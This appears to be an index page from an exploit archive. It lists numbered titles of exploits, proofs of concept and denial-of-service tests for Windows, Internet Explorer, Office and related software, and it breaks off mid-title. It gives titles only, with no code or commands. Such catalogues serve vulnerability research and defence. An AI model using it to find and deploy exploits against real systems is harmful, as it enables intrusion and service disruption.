Microsoft Windows XP Self-Executing Folder Vulnerability [24051] Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun Vulnerability [23989] Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability [23850] Microsoft Windows XP Explorer.EXE Remote Denial of Service Vulnerability [23717] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness [23675] Microsoft Windows XP HCP URI Handler Arbitrary Command Execution Vulnerability [23504] Microsoft Windows XP/2000 showHelp CHM File Execution Weakness [23247] Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability [23229] Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow Vulnerability [23210] Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability [23179] Oracle MySQL for Microsoft Windows MOF Execution [23101] Microsoft Windows 98 Fragmented UDP Flood Denial of Service Vulnerability [23093] Microsoft Windows XP TCP Packet Information Leakage Vulnerability [23019] Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability [22917] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [22883] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) [22882] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) [22870] Microsoft Windows XP/2000 RunDLL32.EXE Buffer Overflow Vulnerability [22837] Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow [22824] Microsoft Windows XP/2000/NT 4 HTML Converter HR Align Buffer Overflow Vulnerability [22782] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [22570] Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability [22528] Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability [22368] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) [22367] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) [22366] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) [22365] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) [22354] Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability [22303] Microsoft Windows Help program (WinHlp32.exe) Crash PoC [22289] Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability [22255] Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability [22245] Microsoft Windows NT/2000 cmd.exe CD Buffer Overflow Vulnerability [22232] Microsoft Windows XP HCP URI Buffer Overflow Vulnerability [22225] Microsoft Windows XP Redirector Privilege Escalation Vulnerability [22194] Microsoft Windows XP/2000/NT 4 Locator Service Buffer Overflow Vulnerability [22132] Microsoft Windows XP/2000 Fontview Denial of Service Vulnerability [21954] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4) [21953] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3) [21952] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2) [21951] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1) [21717] Microsoft Windows XP HCP URI Handler Abuse Vulnerability [21670] Microsoft Windows Media Player 6/7 Filename Buffer Overflow Vulnerability [21485] Microsoft Windows 95/98/2000/NT4 WinHlp Item Buffer Overflow Vulnerability [21389] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2) [21388] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1) [21344] Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability [21258] Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability [21246] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (2) [21245] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (1) [21240] Microsoft Windows XP .Manifest Denial of Service Vulnerability [21172] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (2) [21171] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (1) [21131] Microsoft Windows 2000/XP GDI Denial of Service Vulnerability [21130] Microsoft Windows NT 3/4 CSRSS Memory Access Violation Vulnerability [21123] Microsoft Windows 2000/NT Terminal Server Service RDP DoS Vulnerability [21099] Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability [21069] Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability [21047] Microsoft Windows NT 4.0 NT4ALL DoS Vulnerability [20907] Microsoft Windows 2000 Telnet Username DoS Vulnerability [20861] Microsoft Windows Kernel Intel x64 SYSRET PoC [20613] Microsoft Windows 98/2000 UDP Socket DoS Vulnerability [20596] Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability [20564] Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability [20553] Microsoft Windows Media Player 7.0 .WMZ Arbitrary Java Applet Vulnerability [20528] Microsoft Windows Media Player 7.0 Javascript URL Vulnerability [20460] Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow [20427] Microsoft Windows Media Player 7.0 .ASX Buffer Overflow Vulnerability [20424] Microsoft Windows Media Player 7.0 .WMS Arbitrary Script Vulnerability [20399] Microsoft Indexing Services for Windows 2000 File Verification Vulnerability [20371] Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability [20335] Microsoft Indexing Services for Windows 2000/NT 4.0 .htw Cross-Site Scripting Vulnerability [20317] Microsoft Windows NT 4.0 MSIEXEC Registry Permissions Vulnerability [20288] Microsoft Windows 9x File Handle Buffer Overflow Vulnerability [20284] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (2) [20283] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (1) [20265] Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability [20257] Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities [20255] Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability [20254] Microsoft Windows NT 4.0 Invalid LPC Request DoS Vulnerability [20243] Microsoft Windows Script Host 5.1/5.5 GetObject() File Disclosure Vulnerability [20240] Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability [20222] Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability [20209] Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability [20133] Microsoft Windows 2000 Named Pipes Predictability Vulnerability [20106] Microsoft Windows NT 4/2000 NetBIOS Name Conflict Vulnerability [20048] Microsoft Windows 2000 Remote CPU-overload Vulnerability [20047] Microsoft Windows 2000 Telnet Server DoS Vulnerability [19974] Microsoft Windows Media Services 4.0/4.1 DoS Vulnerability [19889] Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability [19798] Microsoft Windows NT 4.0 User Shell Folders Vulnerability [19759] Microsoft Windows Media Services 4.0/4.1 Handshake Sequence DoS [19754] Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability [19739] Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability [19731] microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal [19673] Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability [19578] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (2) [19577] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1) [19502] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability [19489] Microsoft Windows NT 4.0 DCOM Server Vulnerability [19462] Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability [19451] Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability [19440] Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability [19372] Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability [19359] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4,Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability [19239] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability [19238] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability [19211] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability [19209] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability [19198] Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability [19197] "Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 ""Pass the Hash"" with Modified SMB Client Vulnerability" [19196] "Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability" [19195] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability [19143] "Microsoft Windows ""April Fools 2001"" Vulnerability" [19113] Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability [19103] HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 [19002] Microsoft Windows OLE Object File Handling Remote Code Execution [18819] Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability [18372] Microsoft Windows Assembly Execution Vulnerability MS12-005 [17305] "Microsoft Windows Vista/Server 2008 ""nsiproxy.sys"" Local Kernel DoS Exploit" [17133] Microsoft Windows xp AFD.sys Local Kernel DoS Exploit [17037] PostgreSQL for Microsoft Windows Payload Execution [16957] Oracle MySQL for Microsoft Windows Payload Execution [16660] Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow [16574] Microsoft Windows Shell LNK Code Execution [16374] Microsoft Windows Authenticated User Code Execution [16363] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference [16360] Microsoft Windows SMB Relay Code Execution [15839] Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption [14778] Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll) [14733] Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll) [14731] Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx) [14705] Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability [14674] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050) [14670] Microsoft Windows nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047) [14669] Microsoft Windows win32k!GreStretchBltInternal() Does Not Handle src == dest [14668] Microsoft Windows win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks [14667] Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047) [14666] Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047) [14611] Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048) [14610] Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability [14608] Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048) [14566] "Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow" [14403] Microsoft Windows Automatic LNK Shortcut File Code Execution [13808] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly [12564] Microsoft Windows Outlook Express and Windows Mail Integer Overflow [11195] Microsoft Windows Defender ActiveX Heap Overflow PoC [10068] Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution [9301] Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit [4045] Microsoft Windows Animated Cursor Stack Overflow Exploit [3746] Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2) [1352] Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) [31118] Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability [30887] phPay 2.2.1 Windows Installations Local File Include Vulnerability [30773] Microsoft Jet Database Engine MDB File Parsing Remote Buffer Overflow Vulnerability [30767] Apple Safari 3.0.x for Windows Document.Location.Hash Buffer Overflow Vulnerability [30756] Microsoft Forms 2.0 ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities [30749] Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability [30622] Microsoft Internet Explorer 5.0.1 File Upload Vulnerability [30593] Microsoft MFC Library CFileFind::FindFile Buffer Overflow Vulnerability [30567] Microsoft Agent agentdpv.dll ActiveX Control Malformed URL Stack Buffer Overflow Vulnerability [30537] Microsoft MSN Messenger <= 8.0 - Video Conversation Buffer Overflow Vulnerability [30494] Microsoft Internet Explorer 5.0.1 Vector Markup Language VGX.DLL Remote Buffer Overflow Vulnerability [30493] Microsoft XML Core Services <= 6.0 SubstringData Integer Overflow Vulnerability [30490] Microsoft Internet Explorer 5.0.1 TBLinf32.DLL ActiveX Control Remote Code Execution Vulnerability [30455] Microsoft Internet Explorer 6.0 Position:Relative Denial of Service Vulnerability [30397] Windows Kernel win32k.sys - Integer Overflow (MS13-101) [30285] Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability [30281] Microsoft .Net Framework <= 2.0 - Multiple Null Byte Injection Vulnerabilities [30194] Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability [30193] Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability [30176] Apple Safari 3 for Windows Protocol Handler Command Injection Vulnerability [30169] WindowsPT 1.2 User ID Key Spoofing Vulnerability [30014] Windows NDPROXY - Local SYSTEM Privilege Escalation [30011] Microsoft Tagged Image File Format (TIFF) Integer Overflow [29951] Microsoft SharePoint Server 3.0 Cross-Site Scripting Vulnerability [29858] MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access [29800] Microsoft Internet Explorer 7.0 HTML Denial of Service Vulnerability [29741] Microsoft Internet Explorer 7.0 NavCancel.HTM Cross-Site Scripting Vulnerability [29664] Microsoft Office Publisher 2007 - Remote Denial of Service (DoS) Vulnerability [29660] Microsoft Office 2003 - Denial of Service (DoS) Vulnerability [29619] Microsoft Internet Explorer 6.0 - Local File Access Weakness [29536] Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities [29524] Microsoft Word 2000 - Malformed Function Code Execution Vulnerability [29295] Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service Vulnerability [29292] XAMPP for Windows 1.8.2 - Blind SQL Injection [29236] Microsoft Internet Explorer 7.0 CSS Width Element Denial of Service Vulnerability [29229] Microsoft Internet Explorer 6.0 Frame Src Denial of Service Vulnerability [29172] Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service Vulnerability [28996] Messagebox Shellcode (113 bytes) - Any Windows Version [28974] MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free [28897] Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability [28880] Microsoft Internet Explorer 6.0/7.0 RemoveChild Denial of Service Vulnerability [28877] Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (2) [28876] Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (1) [28822] Microsoft Class Package Export Tool 5.0.2752 0 Clspack.exe Local Buffer Overflow Vulnerability [28679] Evince PDF Reader - 2.32.0.145 (Windows) and 3.4.0 (Linux) - Denial of Service [28500] Microsoft Indexing Service Query Validation Cross-Site Scripting Vulnerability [28481] MS13-069 Microsoft Internet Explorer CCaret Use-After-Free [28438] Microsoft Internet Explorer 5.0.1 Daxctle.OCX Spline Method Heap Buffer Overflow Vulnerability [28421] Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities [28401] Microsoft Internet Explorer 6.0 Visual Studio COM Object Instantiation Denial of Service Vulnerability [28400] Microsoft Internet Explorer 6.0 TSUserEX.DLL ActiveX Control Memory Corruption Vulnerability [28389] Microsoft Internet Explorer 6.0 MSOE.DLL Denial of Service Vulnerability [28387] Microsoft Internet Explorer 6.0 IMSKDIC.DLL Denial of Service Vulnerability [28343] Microsoft Internet Explorer 6.0/7.0 IFrame Refresh Denial of Service Vulnerability [28301] Microsoft Internet Explorer 6.0 Deleted Frame Object Denial of Service Vulnerability [28286] Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability [28265] Microsoft Internet Explorer 6.0 Native Function Iterator Denial of Service Vulnerability [28259] Microsoft Internet Explorer 6.0 NMSA.ASFSourceMediaDescription Stack Overflow Vulnerability [28258] Microsoft Internet Explorer 6.0 - Multiple Object ListWidth Property Denial of Service Vulnerability [28256] Microsoft Internet Explorer 6.0 Internet.HHCtrl Click Denial of Service Vulnerability [28252] Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service Vulnerability [28246] Microsoft Internet Explorer 6.0 OVCtl Denial of Service Vulnerability [28244] Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service Vulnerability [28238] Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability MS13-067 [28226] Microsoft PowerPoint 2003 PPT File Closure Memory Corruption [28225] Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue [28224] Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution [28222] microsoft works 8.0 spreadsheet Multiple Vulnerabilities [28213] Microsoft Internet Explorer 6.0 RevealTrans Denial of Service Vulnerability [28207] Microsoft Internet Explorer 6.0 TriEditDocument Denial of Service Vulnerability [28202] Microsoft Internet Explorer 6.0 HtmlDlgSafeHelper Remote Denial of Service Vulnerability [28198] Microsoft Office 2000/2002 Property Code Execution Vulnerability [28197] Microsoft Internet Explorer 6.0 Object.Microsoft.DXTFilter Denial of Service Vulnerability [28196] Microsoft Internet Explorer 6.0 DirectAnimation.DAUserData Denial of Service Vulnerability [28194] Microsoft Internet Explorer 6 RDS.DataControl Denial of Service Vulnerability [28189] Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution Vulnerability [28187] MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free [28169] Microsoft Internet Explorer 5.0.1/6.0 Structured Graphics Control Denial of Service Vulnerability [28164] Microsoft Internet Explorer 6.0 Href Title Denial of Service Vulnerability [28145] Microsoft Internet Explorer 6.0 ADODB.Recordset Filter Property Denial of Service Vulnerability [28144] Microsoft Internet Explorer 6.0 OutlookExpress.AddressBook Denial of Service Vulnerability [28118] Microsoft Internet Explorer 5.0.1 OuterHTML Redirection Handling Information Disclosure Vulnerability [28087] Microsoft Office 2003 Embedded Shockwave Flash Object Security Bypass Weakness [28082] MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free [28005] Microsoft Exchange Server 2000/2003 Outlook Web Access Script Injection Vulnerability [28001] Microsoft SMB Driver Local Denial of Service Vulnerability [27984] Microsoft DXImageTransform.Microsoft.Light ActiveX Control Remote Code Execution Vulnerability [27971] Microsoft Internet Explorer 5.0.1 Frameset Memory Corruption Vulnerability [27906] Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability [27850] Microsoft Infotech Storage Library Heap Corruption Vulnerability [27745] Outlook Express 5.5/6.0,Windows Mail MHTML URI Handler Information Disclosure Vulnerability [27744] Microsoft Internet Explorer 5.0.1 Modal Dialog Manipulation Vulnerability [27727] Microsoft Internet Explorer 6.0 Nested OBJECT Tag Memory Corruption Vulnerability [27620] Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability [27577] Microsoft Internet Explorer 5.0 Address Bar Spoofing Vulnerability [27476] Microsoft .NET Framework SDK 1.0/1.1 MSIL Tools Buffer Overflow Vulnerabilities [27433] Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow Vulnerability [27180] Windows RT ARM Bind Shell (Port 4444) [27082] Microsoft Internet Explorer 5.0.1 Malformed IMG and XML Parsing Denial of Service Vulnerability [27073] Microsoft Visual Studio UserControl Remote Code Execution Vulnerability (2) [27072] Microsoft Visual Studio UserControl Remote Code Execution Vulnerability (1) [27055] Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability [26985] Microsoft Internet Explorer 5.0.1 HTML Parsing Denial of Service Vulnerabilities [26951] Windows Movie Maker 2.1.4026.0 - (.wav) Crash PoC [26869] Microsoft Excel 95/97/2000/2002/2003/2004 Unspecified Memory Corruption Vulnerabilities [26769] Microsoft Excel 95/97/2000/2002/2003/2004 Malformed Range Memory Corruption Vulnerability [26554] Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation [26517] Microsoft Office PowerPoint 2007 - Crash PoC [26457] Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability [26292] Microsoft Internet Explorer 5.2.3 for Mac OS Denial of Service Vulnerability [26230] Microsoft IIS 5.1 WebDAV HTTP Request Source Code Disclosure Vulnerability [26175] MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow [26167] Microsoft Visual Studio .NET msdds.dll Remote Code Execution Vulnerability [25999] Microsoft Internet Explorer textNode Use-After-Free [25992] Microsoft Internet Explorer 5.0.1 JPEG Image Rendering CMP Fencepost Denial of Service Vulnerability [25991] Microsoft Internet Explorer 5.0.1 JPEG Image Rendering Unspecified Buffer Overflow Vulnerability [25962] Microsoft ASP.NET 1.0/1.1 RPC/Encoded Remote Denial of Service Vulnerability [25912] Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit [25784] Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability [25408] Windows Media Player 11.0.0 (.wav) - Crash PoC [25386] Microsoft Internet Explorer 5.0.1 DHTML Object Race Condition Memory Corruption Vulnerability [25385] Microsoft Internet Explorer 5.0.1 Content Advisor File Handling Buffer Overflow Vulnerability [25294] Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability [25157] Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability [25129] Microsoft Internet Explorer 6.0 Pop-up Window Title Bar Spoofing Weakness [25110] Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities [25095] Microsoft Internet Explorer 5.0.1 Mouse Event URI Status Bar Obfuscation Weakness [25085] Microsoft Office XP 2000/2002 HTML Link Processing Remote Buffer Overflow Vulnerability [25084] Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection Vulnerability [25032] Windows Media Player 9.0 ActiveX Control File Enumeration Weakness [25031] Windows Media Player 9.0 ActiveX Control Media File Attribute Corruption Weakness [24999] Windows Light HTTPD 0.1 - Buffer Overflow [24968] Mikrotik Syslog Server for Windows 1.15 - Denial of Service [24808] Microsoft Internet Explorer 6.0 Search Pane URI Obfuscation Vulnerability [24802] Microsoft Internet Explorer 6.0 Sysimage Protocol Handler Local File Detection Vulnerability [24800] Microsoft Internet Explorer 5.0.1 FTP URI Arbitrary FTP Server Command Execution Vulnerability [24775] Microsoft Internet Explorer 6.0 Infinite Array Sort Denial of Service Vulnerability [24727] Microsoft Internet Explorer 6.0 - Local Resource Enumeration Vulnerability [24720] Microsoft Internet Explorer 6.0 IFRAME Status Bar URI Obfuscation Weakness [24714] Microsoft Internet Explorer 6.0 HTML Form Tags URI Obfuscation Weakness [24712] Microsoft Internet Explorer 6.0 TABLE Status Bar URI Obfuscation Weakness [24705] Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability [24693] Microsoft Internet Explorer 5.x Valid File Drag and Drop Embedded Code Vulnerability [24687] Microsoft Outlook Express 4.x/5.x/6.0 Plaintext Email Security Policy Bypass Vulnerability [24686] Microsoft Outlook 2003 Security Policy Bypass Vulnerability [24666] Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability [24640] Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (2) [24639] Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (1) [24637] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (4) [24636] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (3) [24635] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (2) [24634] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (1) [24538] MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free [24495] Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009) [24437] Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read [24407] Microsoft Internet Explorer 6.0 Resource Detection Weakness [24366] Windows Manage Memory Payload Injection [24354] Microsoft Internet Explorer 6.0 mms Protocol Handler Executable Command Line Injection Vulnerability [24328] Microsoft Internet Explorer 5.0.1 Style Tag Comment Memory Corruption Vulnerability [24281] Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service Vulnerability [24267] Microsoft Internet Explorer 6.0 JavaScript Null Pointer Exception Denial of Service Vulnerability [24266] Microsoft Internet Explorer 5.0.1 Popup.show Mouse Event Hijacking Vulnerability [24265] Microsoft Internet Explorer 5.0.1 JavaScript Method Assignment Cross-Domain Scripting Vulnerability [24249] Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness [24213] Microsoft Internet Explorer 5.0.1 Wildcard DNS Cross-Site Scripting Vulnerability [24211] Microsoft Internet Explorer 6.0 HREF Save As Denial of Service Vulnerability [24187] Microsoft Internet Explorer 6.0 ADODB.Stream Object File Installation Weakness [24174] Microsoft Internet Explorer 6.0 URL Local Resource Access Weakness [24135] Microsoft Internet Explorer 5.0.1 CSS Style Sheet Memory Corruption Vulnerability [24119] Microsoft Internet Explorer 5.0.1 http-equiv Meta Tag Denial of Service Vulnerability [24118] Microsoft Outlook Express 6.0 URI Obfuscation Vulnerability [24117] Microsoft Internet Explorer 6.0 Codebase Double Backslash Local Zone File Execution Weakness [24114] Microsoft Outlook 2003Mail Client E-mail Address Verification Weakness [24112] Microsoft Internet Explorer 6.0 XML Parsing Denial of Service Vulnerability [24102] Microsoft Internet Explorer 4/5/6 Embedded Image URI Obfuscation Weakness [24101] Microsoft Outlook 2003 Predictable File Location Weakness [24069] Microsoft Internet Explorer 6.0 Meta Data Foreign Domain Spoofing Vulnerability [24020] Microsoft Internet Explorer Option Element Use-After-Free [24002] Microsoft Outlook Express 6.0 - Remote Denial of Service Vulnerability [23912] Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability [23911] Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability [23903] Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation Vulnerability [23796] Microsoft Outlook 2002 Mailto Parameter Quoting Zone Bypass Vulnerability [23790] Microsoft Internet Explorer 5 window.open Search Pane Cross-Zone Scripting Vulnerability [23785] Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability [23768] Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability [23766] Microsoft Internet Explorer 5/6 Cross-Domain Event Leakage Vulnerability [23754] Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability [23695] Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability [23679] Microsoft Internet Explorer 5 Shell: IFrame Cross-Zone Scripting Vulnerability (2) [23678] Microsoft Internet Explorer 5 Shell: IFrame Cross-Zone Scripting Vulnerability (1) [23668] Microsoft Internet Explorer 5.0.1 LoadPicture File Enumeration Weakness [23649] Microsoft SQL Server Database Link Crawling Command Execution [23643] Microsoft Internet Explorer 5 NavigateAndFind() Cross-Zone Policy Vulnerability [23531] HD Soft Windows FTP Server 1.5/1.6 Username Format String Vulnerability [23493] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (3) [23492] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (2) [23491] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (1) [23490] Microsoft IIS 5.0 Failure To Log Undocumented TRACK Requests Vulnerability [23401] Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (2) [23400] Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (1) [23340] Microsoft Internet Explorer 6.0 Double Slash Cache Zone Bypass Vulnerability [23321] Microsoft Internet Explorer 6-10 Mouse Tracking [23283] Microsoft Internet Explorer 6.0 - Local Resource Reference Vulnerability [23273] Microsoft Internet Explorer 6.0 Scrollbar-Base-Color Partial Denial of Service Vulnerability [23255] Microsoft ListBox/ComboBox Control User32.dll Function Buffer Overrun Vulnerability [23216] Microsoft Word 97/98/2002 Malformed Document Denial of Service Vulnerability [23215] Microsoft Internet Explorer 6 Absolute Position Block Denial of Service Vulnerability [23131] Microsoft Internet Explorer 6.0 Script Execution Vulnerabilities [23122] Microsoft Internet Explorer 5 XML Page Object Type Validation Vulnerability [23114] Microsoft Internet Explorer 5/6 Browser Popup Window Object Type Validation Vulnerability [23113] Microsoft Exchange Server 4.0/5.0 SMTP HELO Argument Buffer Overflow Vulnerability [23096] Microsoft WordPerfect Converter Buffer Overrun Vulnerability [23095] Microsoft Access 97/2000/2002 Snapshot Viewer ActiveX Control Parameter Buffer 